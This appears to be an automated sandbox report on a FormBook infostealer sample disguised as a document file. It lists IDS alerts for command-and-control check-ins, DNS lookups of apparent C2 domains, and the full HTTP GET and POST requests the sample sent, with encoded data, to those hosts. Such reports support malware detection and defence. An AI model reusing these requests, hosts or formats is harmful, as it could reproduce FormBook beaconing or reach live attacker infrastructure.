Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63375 -> 38.181.141.122:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63368 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63335 -> 147.92.40.175:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63326 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63362 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63367 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63342 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63366 -> 206.119.82.134:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63322 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63328 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63317 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63332 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63325 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63340 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63340 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63343 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63332 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63345 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63328 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63372 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63338 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63320 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63372 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63320 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63370 -> 65.21.196.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63373 -> 38.181.141.122:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63324 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63319 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63334 -> 147.92.40.175:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63355 -> 104.21.11.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63323 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63353 -> 104.21.11.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63374 -> 38.181.141.122:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63361 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63324 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63341 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63360 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63358 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63360 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63376 -> 38.181.141.122:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63376 -> 38.181.141.122:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63318 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63369 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63354 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63321 -> 172.96.187.60:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63330 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63349 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63339 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63348 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63348 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63357 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63327 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63363 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63329 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63331 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63364 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63364 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63344 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63344 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63365 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63350 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63371 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63377 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63377 -> 81.88.63.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63337 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63333 -> 147.92.40.175:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63352 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63352 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:63351 -> 85.153.138.113:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:63356 -> 104.21.11.31:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:63356 -> 104.21.11.31:80
            Source: DNS query: www.heldhold.xyz
            Source: DNS query: www.rtpngk.xyz
            Source: DNS query: www.030002304.xyz
            Source: Joe Sandbox View; IP Address: 67.223.117.189
            Source: Joe Sandbox View; IP Address: 65.21.196.90
            Source: Joe Sandbox View; ASN Name: VIMRO-AS15189US
            Source: Joe Sandbox View; ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK
            Source: Joe Sandbox View; ASN Name: CP-ASDE
            Source: Joe Sandbox View; ASN Name: SINGLEHOP-LLCUS
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe; Code function: 0_2_0076550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile
            Source: global traffic; HTTP traffic detected:
                GET /a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.2bhp.com
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /8pln/?pP_8=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.ultraleap.net
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /v2c3/?V0Qh=4pBta8&pP_8=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.dalong.site
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /xamn/?pP_8=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.mgeducacaopro.online
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /fava/?pP_8=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.heldhold.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.63582.photo
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /68ac/?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.useanecdotenow.tech
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /kt2f/?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.asiapartnars.online
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /al6z/?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.linkwave.cloud
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /3lu7/?pP_8=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.mfgarage.net
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /zznj/?V0Qh=4pBta8&pP_8=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.b5x7vk.agency
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /altr/?pP_8=VbdX0kog8qSHBufLtK+0qwwL6pFhzbi14fGg/CN3kiEzjMV75sm4cjiJhcKV1R019AsMCDZ1hQxpRPghO7Wf1QtEjpaGbTqiMLtSz+Xi+YiI4oFd5iwYses=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.rtpngk.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /hzuv/?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.doggieradio.net
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /v4cy/?pP_8=Y61bwknhs9hp9ZZcYkoE/rAHAVoATd7g+jLHgGwEyJh/LKrsM6hsQ8y2QWfg6r+Pzdmi8z7VAqFTz6bCx0F+lD/ii+PJJ/2nHI8msyIEMT4A2MQn/4udzH0=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.40wxd.top
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /tmpg/?pP_8=CVP6mu+p7AIAUeNlIzILzbbwoLVaLtEPp22R6YZws2HFwQ6gURLmFkDuTnsSzWDqU9qDd9fOW/TdFJInumJ7doiOdR5iBNH/a8rQv0stnRBrBPHE6g/KoYg=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.030002304.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; HTTP traffic detected:
                GET /c0yj/?pP_8=RtxJIiPVwFtoON8X5lg1/pck0zde3AcVW+Sw8LHuBGbwhWeZHgga75pQywOD+eRBU36nZddvjNScILyGR/VfIgCLIuIjBhPcY00gClaWQM5nJXPcxtJH+zI=&V0Qh=4pBta8 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.kfowks.site
                Connection: close
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global traffic; DNS traffic detected: DNS query: www.2bhp.com
            Source: global traffic; DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: global traffic; DNS traffic detected: DNS query: www.ultraleap.net
            Source: global traffic; DNS traffic detected: DNS query: www.dalong.site
            Source: global traffic; DNS traffic detected: DNS query: www.mgeducacaopro.online
            Source: global traffic; DNS traffic detected: DNS query: www.heldhold.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.63582.photo
            Source: global traffic; DNS traffic detected: DNS query: www.useanecdotenow.tech
            Source: global traffic; DNS traffic detected: DNS query: www.asiapartnars.online
            Source: global traffic; DNS traffic detected: DNS query: www.linkwave.cloud
            Source: global traffic; DNS traffic detected: DNS query: www.mfgarage.net
            Source: global traffic; DNS traffic detected: DNS query: www.b5x7vk.agency
            Source: global traffic; DNS traffic detected: DNS query: www.rtpngk.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.doggieradio.net
            Source: global traffic; DNS traffic detected: DNS query: www.40wxd.top
            Source: global traffic; DNS traffic detected: DNS query: www.030002304.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.kfowks.site
            Source: unknown; HTTP traffic detected:
                POST /8pln/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate
                Host: www.ultraleap.net
                Origin: http://www.ultraleap.net
                Content-Length: 201
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Connection: close
                Referer: http://www.ultraleap.net/8pln/
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                Data Ascii: pP_8=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Date: Wed, 11 Sep 2024 09:17:25 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Wed, 11 Sep 2024 09:17:55 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Wed, 11 Sep 2024 09:17:57 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Wed, 11 Sep 2024 09:18:00 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic; HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 796
                date: Wed, 11 Sep 2024 09:18:02 GMT
                server: LiteSpeed
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:21 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:21 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:24 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:26 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html
